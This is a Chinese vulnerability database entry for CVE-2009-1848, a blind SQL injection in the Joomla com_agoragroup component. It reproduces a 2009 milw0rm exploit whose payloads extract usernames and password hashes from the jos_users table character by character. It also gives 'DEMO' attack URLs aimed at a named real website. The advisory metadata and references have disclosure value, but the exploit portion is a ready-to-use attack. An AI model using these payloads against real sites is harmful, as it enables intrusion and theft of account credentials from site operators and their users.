JoomlaMe AgoraGroups SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117852 漏洞类型 SQL注入
发布时间 2009-05-27 更新时间 2009-06-08
CVE编号 CVE-2009-1848 CNNVD-ID CNNVD-200906-014
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8814
https://cxsecurity.com/issue/WLB-2009060093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-014
|漏洞详情
Joomla!JoomlaMeAgoraGroups(又称AG或com_agoragroup)组件0.3.5.3版本中存在SQL注入漏洞。远程攻击者可以借助对index.php的一个groupdetail操作中的id参数,执行任意SQL指令。
|漏洞EXP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_agoragroup (id) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Greetz        :  d4n!ux x_jeshua + eCORE + Painboy + rayok3nt & N03!
[+] Vulnerability :  Blind SQL injection 
[+] Google Dork   :  imagine ;)
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios@gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_agoragroup&con=groupdetail&id=2[SQL code]


SQL code:
and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96


DEMO:


http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1

http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=72



etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>AgoraGroup</name>
<version>0.3.5.3</version>
<description>AgoraGroups- Groups component for Agora Forum v.3+</description>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<author>The JoomlaMe team</author>
<authoremail>info@easy-joomla.org</authoremail>
<authorurl>http://www.easy-joomla.org</authorurl>

# milw0rm.com [2009-05-27]
|参考资料

来源:BID
名称:35118
链接:http://www.securityfocus.com/bid/35118
来源:MILW0RM
名称:8814
链接:http://www.milw0rm.com/exploits/8814